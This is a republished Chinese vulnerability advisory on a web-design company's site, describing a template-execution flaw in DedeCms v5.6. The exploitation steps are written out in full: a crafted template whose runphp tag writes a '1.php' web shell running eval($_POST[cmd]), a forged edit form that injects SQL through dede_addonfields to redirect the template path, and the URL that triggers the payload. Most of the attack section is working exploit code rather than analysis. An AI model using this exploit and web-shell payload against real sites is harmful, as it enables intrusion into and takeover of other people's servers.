400-1100-266

9:00-24:00(工作日)

主页 > 网站建设 > 建站知识 > DedeCms/织梦cms模板执行漏洞(影响版本v5.6)

DedeCms/织梦cms模板执行漏洞(影响版本v5.6)

POST TIME:2017-11-13 00:50

html5响应式网站织梦模板源码IT网络工作室织梦网

html5响应式网站织梦模板源码IT网络工作室织梦网

工业环保工程类企业网站织梦模板(带手机端)

工业环保工程类企业网站织梦模板(带手机端)

软件APP类网站源码织梦通用型企业网站源码html

软件APP类网站源码织梦通用型企业网站源码html

蓝色安防器材公司类整站模板

蓝色安防器材公司类整站模板

影响版本:
DEDECMS v5.6 Final

程序介绍:
DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心,是目前国内应用最广泛的php类CMS系统。

漏洞分析:

Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。

1、member/article_edit.php文件(注入):
//漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是我们可以给附加表的内容进行update赋值。
PHP Code复制内容到剪贴板
  2. //分析处理附加表数据
  3. $inadd_f='';
  4. if(!emptyempty($dede_addonfields))//自己构造$dede_addonfields
  5. {
  6. $addonfields=explode(';',$dede_addonfields);
  7. if(is_array($addonfields))
  8. {
  9. print_r($addonfields);
  10. foreach($addonfieldsas$v)
  11. {
  12. if($v=='')
  13. {
  14. continue;
  15. }
  16. $vs=explode(',',$v);
  17. if(!isset(${$vs[0]}))
  18. {
  19. ${$vs[0]}='';
  20. }
  21. ${$vs[0]}=GetFieldValueA(${$vs[0]},$vs[1],$aid);
  22. $inadd_f.=','.$vs[0]."='".${$vs[0]}."'";
  23. echo$inadd_f;
  24. }
  25. }
  26. }
  28. if($addtable!='')
  29. {
  30. $upQuery="Update`$addtable`settypeid='$typeid',body='$body'{$inadd_f},userip='$userip'whereaid='$aid'";//执行构造的sql
  31. if(!$dsql->ExecuteNoneQuery($upQuery))
  32. {
  33. ShowMsg("更新附加表`$addtable`时出错,请联系管理员!","javascript:;");
  34. exit();
  35. }
  36. }
2、include/inc_archives_view.php:
//这是模板处理类,如果附加表的模板路径存在,直接从附加表取值;GetTempletFile获取模板文件的方法就是取的此处的模板路径,从来带进去解析。
PHP Code复制内容到剪贴板
  2. //issystem==-1表示单表模型,单表模型不支持redirecturl这类参数,因此限定内容普通模型才进行下面查询
  3. if($this->ChannelUnit->ChannelInfos['addtable']!=''&&$this->ChannelUnit->ChannelInfos['issystem']!=-1)
  4. {
  5. if(is_array($this->addTableRow))
  6. {
  7. $this->Fields['redirecturl']=$this->addTableRow['redirecturl'];
  8. $this->Fields['templet']=$this->addTableRow['templet'];//取值
  9. $this->Fields['userip']=$this->addTableRow['userip'];
  10. }
  11. $this->Fields['templet']=(emptyempty($this->Fields['templet'])?'':trim($this->Fields['templet']));
  12. $this->Fields['redirecturl']=(emptyempty($this->Fields['redirecturl'])?'':trim($this->Fields['redirecturl']));
  13. $this->Fields['userip']=(emptyempty($this->Fields['userip'])?'':trim($this->Fields['userip']));
  14. }
  15. else
  16. {
  17. $this->Fields['templet']=$this->Fields['redirecturl']='';
  18. }
  21. //获得模板文件位置
  22. functionGetTempletFile()
  23. {
  24. global$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
  25. $cid=$this->ChannelUnit->ChannelInfos['nid'];
  26. if(!emptyempty($this->Fields['templet']))
  27. {
  28. $filetag=MfTemplet($this->Fields['templet']);
  29. if(!ereg('/',$filetag))$filetag=$GLOBALS['cfg_df_style'].'/'.$filetag;
  30. }
  31. else
  32. {
  33. $filetag=MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
  34. }
  35. $tid=$this->Fields['typeid'];
  36. $filetag=str_replace('{cid}',$cid,$filetag);
  37. $filetag=str_replace('{tid}',$tid,$filetag);
  38. $tmpfile=$cfg_basedir.$cfg_templets_dir.'/'.$filetag;
  39. if($cid=='spec')
  40. {
  41. if(!emptyempty($this->Fields['templet']))
  42. {
  43. $tmpfile=$cfg_basedir.$cfg_templets_dir.'/'.$filetag;
  44. }
  45. else
  46. {
  47. $tmpfile=$cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
  48. }
  49. }
  50. if(!file_exists($tmpfile))
  51. {
  52. $tmpfile=$cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec'?'article_spec.htm':'article_default.htm');
  53. }
  54. return$tmpfile;
  55. }
漏洞利用:

1.上传一个模板文件:

注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg

模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2.修改刚刚发表的文章,查看源文件,构造一个表单:
XML/HTML Code复制内容到剪贴板
  1. <formclass="mTB10mL10mR10"name="addcontent"id="addcontent"action="http://127.0.0.1/dede/member/article_edit.php"method="post"enctype="multipart/form-data"onsubmit="returncheckSubmit();">
  2. <inputtype="hidden"name="dopost"value="save"/>
  3. <inputtype="hidden"name="aid"value="2"/>
  4. <inputtype="hidden"name="idhash"value="f5f682c8d76f74e810f268fbc97ddf86"/>
  5. <inputtype="hidden"name="channelid"value="1"/>
  6. <inputtype="hidden"name="oldlitpic"value=""/>
  7. <inputtype="hidden"name="sortrank"value="1275972263"/>
  8. <divid="mainCp">
  9. <h3class="meTitle"><strong>修改文章</strong></h3>
  10. <divclass="postForm">
  11. <label>标题:</label>
  12. <inputname="title"type="text"id="title"value="11233ewsad"maxlength="100"class="intxt"/>
  13. <label>标签TAG:</label>
  14. <inputname="tags"type="text"id="tags"value="hahah,test"maxlength="100"class="intxt"/>(用逗号分开)
  15. <label>作者:</label>
  16. <inputtype="text"name="writer"id="writer"value="test"maxlength="100"class="intxt"style="width:219px"/>
  17. <label>隶属栏目:</label>
  18. <selectname='typeid'size='1'>
  19. <optionvalue='1'class='option3'selected=''>测试栏目</option>
  20. </select><spanstyle="color:#F00">*</span>(不能选择带颜色的分类)
  21. <label>我的分类:</label>
  22. <selectname='mtypesid'size='1'>
  23. <optionvalue='0'selected>请选择分类...</option>
  24. <optionvalue='1'class='option3'selected>hahahha</option>
  25. </select>
  26. <label>信息摘要:</label>
  27. <textareaname="description"id="description">1111111</textarea>
  28. (内容的简要说明)
  29. <label>缩略图:</label>
  30. <inputname="litpic"type="file"id="litpic"onchange="SeePicNew('divpicview',this);"maxlength="100"class="intxt"/>
  31. <inputtype='text'name='templet'
  32. value="../uploads/userup/2/12OMX04-15A.jpg">
  33. <inputtype='text'name='dede_addonfields'
  34. value="templet,htmltext;">(这里构造)
  35. </div>
  36. <!--表单操作区域-->
  37. <h3class="meTitle">详细内容</h3>
  38. <divclass="contentShowpostForm">
  39. <inputtype="hidden"id="body"name="body"value="<div><ahref="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg"target="_blank"><imgborder="0"alt=""src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg"width="1010"height="456"/></a></div><p><?phpinfo()?>1111111</p>"style="display:none"/><inputtype="hidden"id="body___Config"value="FullPage=false"style="display:none"/><iframeid="body___Frame"src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member"width="100%"height="350"frameborder="0"scrolling="no"></iframe>
  40. <label>验证码:</label>
  41. <inputname="vdcode"type="text"id="vdcode"maxlength="100"class="intxt"style='width:50px;text-transform:uppercase;'/>
  42. <imgsrc="http://127.0.0.1/dede/include/vdimgck.php"alt="看不清?点击更换"align="absmiddle"style="cursor:pointer"onclick="this.src=this.src+'?'"/>
  43. <buttonclass="button2"type="submit">提交</button>
  44. <buttonclass="button2ml10"type="reset"onclick="location.reload();">重置</button>
  45. </div>
  46. </div>
  47. </form>
提交,提示修改成功,则我们已经成功修改模板路径。

3.访问修改的文章:

假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成小马:1.php

解决方案:
厂商补丁:
DEDECMS
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/

信息来源: oldjun's Blog



推荐建站资讯更多>>
推荐模板下载更多>>
响应式工业重工网站源码机械类网站织梦模板

响应式工业重工网站源码机械类网站织梦模板

织梦标识公司类红色大气营销模板

织梦标识公司类红色大气营销模板

蓝色物业类企业公司网站织梦模板

蓝色物业类企业公司网站织梦模板

上一篇:Dedecms/织梦cms建站经验和技巧总结

下一篇:DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY

 
微信咨询办理
在线QQ客服
( 客服小王 )
( 客服小李 )
( 客服小刘 )
( 客服小张 )
关于我们 | 荣誉资质 | 代理加盟 | 定制研发 | 增值服务 | 域名注册 | 网站套餐 | 建站知识

Copyright © 1999-2012 诚信 合法 规范的巨人网络 www.1330.cn 始建于2005年

全国网站建设网站开发咨询热线:400-1100-266   0514-86177077

江苏扬州巨人网络科技有限公司   总部地址:江苏省扬州信息产业基地11号楼4层

《增值电信业务经营许可证》苏B2-20120278    苏ICP备15040257号 网站地图

DedeCms,织梦,cms,模板,执行,
全国咨询热线
400-1100-266
在线客服( QQ:340506921 )
版权所有:巨人网络(扬州)科技有限公司——拥有网站建设十年经验,具备独立网站开发能力,能够提供完善的网站设计及相关的网站制作服务!     全国统一服务热线:400-1100-266
收缩
  • 微信客服
  • 微信二维码

  • 电话咨询

  • 400-1100-266